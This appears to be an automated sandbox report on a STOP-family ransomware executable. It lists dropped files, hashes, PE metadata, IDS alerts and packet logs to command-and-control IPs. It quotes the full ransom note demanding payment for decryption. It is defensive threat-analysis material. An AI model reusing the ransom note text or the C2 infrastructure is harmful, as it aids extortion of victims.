                                                                                                                                      C:\Users\jones\SendTo\Desktop (create shortcut).DeskLink.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):341
                                                                                                                                      Entropy (8bit):7.2493456551344915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:5znhDQKXPkH+CT0bzGOqHd3Ob2jf9BdlltJg+DBx27vSBMWHQq3ukIcii96Z:BpQKXPkH+CTL9+b4lrq+P2jtmXukIciD
                                                                                                                                      MD5:7698A6BFC418991A34EE349BF8190EDE
                                                                                                                                      SHA1:3296749F5A7FFE2BEBD165AA85950822B037D39B
                                                                                                                                      SHA-256:EE0B684A5137CFC99D06448568F7C0E5712D61381B4D90B9961A8422355AD8A2
                                                                                                                                      SHA-512:E433AE1D4054DE832437F668002A091EF5C0E9ACC0F0C7F3D9C14BE63566E8E969E016A52D8195BFBF188457B3CB8057FD3AACB4F116BA8E7ED68517D92922AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:desktI!..d....,0.d..jk..r.(.d-2.1.V.h...MLM.+....!=...Q.C......5...Nd..ea.'..3...{.-.......!.......~.R[.#..,..'.*..W+.4".T.....W.6.+..=...)\ ..id...5.._.h..V.b....].:.O..O....&\..\.<.i.l8..).0...{\:x..I.B...g:R....EI..N.l.:.[c..w..c..b..,....:.....=.u.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      C:\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.7015766496836555
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:qJKiVKZdFk.exe
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5:f3ad3e0f90adfd9a28dbeab4bc6196ef
                                                                                                                                      SHA1:5b699f023304e78d905345b254ebc608a4726721
                                                                                                                                      SHA256:62623bddab0911eca4cd33135383761dbcf6f22a480eda9761becf638f1c4546
                                                                                                                                      SHA512:1a81ab93e0045be0408bfa5f18095df63e7a504d5258e34f37b1a1a2357aee955918e7852d70c0b269425a15661656cc71fcb4944d4546eb87893974b3f39349
                                                                                                                                      SSDEEP:12288:O53AxLUl6AiI6LWr0A91IaNnrC0RAbRXouUUfXZLCdSZSoHfx1uDbccdt7Hw:OAHuRr0U1IF1RXd9fQGSoHfGncit7Q
                                                                                                                                      TLSH:BCF412017ED2CB71E4A3CE3358628950D93EFC7255B04A77337E964E0A715C08A9EB6A
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%G..a&..a&..a&..lt`.|&..lt_..&..lt^.M&..h^,.f&..a&...&....Z.`&..ltd.`&....a.`&..Richa&..........PE..L......c...................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:532145454549710d

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x403f4f
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x63D7B0F7 [Mon Jan 30 11:58:47 2023 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:0c221599ea7b9c4f042cfb23a69ed3b1

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      call 00007F6D812A7B15h
                                                                                                                                      jmp 00007F6D812A2F85h
                                                                                                                                      push 00000014h
                                                                                                                                      push 00418950h
                                                                                                                                      call 00007F6D812A4280h
                                                                                                                                      call 00007F6D812A7CE6h
                                                                                                                                      movzx esi, ax
                                                                                                                                      push 00000002h
                                                                                                                                      call 00007F6D812A7AA8h
                                                                                                                                      pop ecx
                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                      je 00007F6D812A2F86h
                                                                                                                                      xor ebx, ebx
                                                                                                                                      jmp 00007F6D812A2FB5h
                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                      jne 00007F6D812A2F6Dh
                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                      jne 00007F6D812A2F5Fh
                                                                                                                                      xor ebx, ebx
                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                      jbe 00007F6D812A2F8Bh
                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                      setne bl
                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                      call 00007F6D812A751Bh
                                                                                                                                      test eax, eax
                                                                                                                                      jne 00007F6D812A2F8Ah
                                                                                                                                      push 0000001Ch
                                                                                                                                      call 00007F6D812A3061h
                                                                                                                                      pop ecx
                                                                                                                                      call 00007F6D812A7477h
                                                                                                                                      test eax, eax
                                                                                                                                      jne 00007F6D812A2F8Ah
                                                                                                                                      push 00000010h
                                                                                                                                      call 00007F6D812A3050h
                                                                                                                                      pop ecx
                                                                                                                                      call 00007F6D812A7B21h
                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                      call 00007F6D812A5351h
                                                                                                                                      test eax, eax
                                                                                                                                      jns 00007F6D812A2F8Ah
                                                                                                                                      push 0000001Bh
                                                                                                                                      call 00007F6D812A3036h
                                                                                                                                      pop ecx
                                                                                                                                      call dword ptr [004110B8h]
                                                                                                                                      mov dword ptr [0409FDBCh], eax
                                                                                                                                      call 00007F6D812A7B3Ch
                                                                                                                                      mov dword ptr [004B230Ch], eax
                                                                                                                                      call 00007F6D812A74DFh
                                                                                                                                      test eax, eax
                                                                                                                                      jns 00007F6D812A2F8Ah

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x18d840x50.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ca00000xd808.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x111f00x38.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x182b80x40.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x110000x188.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000xfd780xfe00567a08286e0810a1ebc62c505f8909a4False0.6031157726377953data6.720209460914761IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x110000x86700x880060d24a3e892bf08cee50403dd3d6620dFalse0.4499942555147059data5.076810290088525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x1a0000x3c85dc00x98400e376c3d1ddd20e83f0f273dc6b8ce4cdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x3ca00000xd8080xda00b5ce968329c2fa7ac5a7661855f40b41False0.5072211869266054data5.392693881836683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      AFX_DIALOG_LAYOUT0x3cace680xedata1.5714285714285714
                                                                                                                                      AFX_DIALOG_LAYOUT0x3cace780xedata1.5714285714285714
                                                                                                                                      RT_ICON0x3ca04d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.5655650319829424
                                                                                                                                      RT_ICON0x3ca13780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5473826714801444
                                                                                                                                      RT_ICON0x3ca1c200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.619942196531792
                                                                                                                                      RT_ICON0x3ca21880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.46141078838174276
                                                                                                                                      RT_ICON0x3ca47300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4896810506566604
                                                                                                                                      RT_ICON0x3ca57d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.4959016393442623
                                                                                                                                      RT_ICON0x3ca61600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.450354609929078
                                                                                                                                      RT_ICON0x3ca66300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.4189765458422175
                                                                                                                                      RT_ICON0x3ca74d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.47653429602888087
                                                                                                                                      RT_ICON0x3ca7d800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5766129032258065
                                                                                                                                      RT_ICON0x3ca84480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.47760115606936415
                                                                                                                                      RT_ICON0x3ca89b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.46898340248962656
                                                                                                                                      RT_ICON0x3caaf580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4842870544090056
                                                                                                                                      RT_ICON0x3cac0000x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.5024590163934426
                                                                                                                                      RT_ICON0x3cac9880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.5593971631205674
                                                                                                                                      RT_STRING0x3cad0700x3d2dataRomanianRomania0.46319018404907975
                                                                                                                                      RT_STRING0x3cad4480x3bcdataRomanianRomania0.4592050209205021
                                                                                                                                      RT_GROUP_ICON0x3ca65c80x68dataRomanianRomania0.6923076923076923
                                                                                                                                      RT_GROUP_ICON0x3cacdf00x76dataRomanianRomania0.6779661016949152
                                                                                                                                      RT_VERSION0x3cace880x1e4data0.5392561983471075

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllLocalCompact, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, EnumTimeFormatsA, GetUserDefaultLangID, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, WriteConsoleW, MultiByteToWideChar, GetTempPathW, InterlockedExchange, GetLastError, ChangeTimerQueueTimer, SetLastError, FindResourceExW, GetProcAddress, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, LocalAlloc, GetExitCodeThread, AddAtomW, RemoveDirectoryW, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, SetCalendarInfoA, GetWindowsDirectoryW, GetConsoleProcessList, GetVolumeInformationW, GetThreadLocale, GetSystemDefaultLangID, GetStringTypeW, OutputDebugStringW, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, HeapAlloc, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetProcessHeap, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, CreateFileW
                                                                                                                                      ADVAPI32.dllDeregisterEventSource
                                                                                                                                      WINHTTP.dllWinHttpOpen

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      RomanianRomania

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      04/24/24-14:42:14.071401TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4970580192.168.2.7189.232.19.193
                                                                                                                                      04/24/24-14:42:10.980226TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4970280192.168.2.7211.181.24.132
                                                                                                                                      04/24/24-14:42:10.980226TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4970280192.168.2.7211.181.24.132
                                                                                                                                      04/24/24-14:42:11.004642TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4970480192.168.2.7189.232.19.193
                                                                                                                                      04/24/24-14:42:14.071401TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4970580192.168.2.7189.232.19.193
                                                                                                                                      04/24/24-14:42:11.787679TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049703189.232.19.193192.168.2.7
                                                                                                                                      04/24/24-14:42:11.756826TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049704189.232.19.193192.168.2.7

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 24, 2024 14:42:02.952459097 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:02.952557087 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:02.952686071 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:02.965251923 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:02.965285063 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:03.309413910 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:03.309552908 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:03.373238087 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:03.373301029 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:03.374479055 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:03.374572992 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:03.378213882 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:03.420145035 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:04.086415052 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:04.086534977 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:04.086539030 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:04.086610079 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:04.088705063 CEST49699443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:04.088721991 CEST44349699104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.338363886 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.338411093 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.338478088 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.353415012 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.353431940 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.689059019 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.689157963 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.693816900 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.693875074 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.695137978 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:05.695208073 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.701972008 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:05.748120070 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.019583941 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.019639015 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.019735098 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.030200958 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.030217886 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.360470057 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.360594034 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.365279913 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.365293980 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.365680933 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.365751982 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.367888927 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.412117958 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.580271959 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.580389023 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.580415010 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.580635071 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.581367016 CEST49700443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:06.581409931 CEST44349700104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:07.128288984 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:07.128417969 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:07.128442049 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:07.128504992 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:07.128506899 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:07.128551960 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:07.128884077 CEST49701443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:07.128896952 CEST44349701104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.682106018 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:10.797914982 CEST4970380192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:10.797976017 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:10.979857922 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.980007887 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:10.980226040 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.004270077 CEST8049704189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.004288912 CEST8049703189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.004375935 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.004379034 CEST4970380192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.004527092 CEST4970380192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.004642010 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.250075102 CEST8049704189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.250097990 CEST8049703189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.449896097 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.449922085 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.449985981 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.450025082 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.748003006 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.748045921 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.748059988 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.748121977 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.748140097 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.748158932 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.748198986 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:11.756825924 CEST8049704189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.756871939 CEST8049704189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.756916046 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.756953001 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.757085085 CEST4970480192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.787678957 CEST8049703189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.787703037 CEST8049703189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.787760973 CEST4970380192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.787913084 CEST4970380192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:11.961539984 CEST8049704189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:11.992429972 CEST8049703189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.046922922 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.046966076 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.047002077 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:12.047017097 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.047029972 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:12.047060013 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:12.047081947 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.047103882 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:12.047122955 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:12.047141075 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:12.047141075 CEST8049702211.181.24.132192.168.2.7
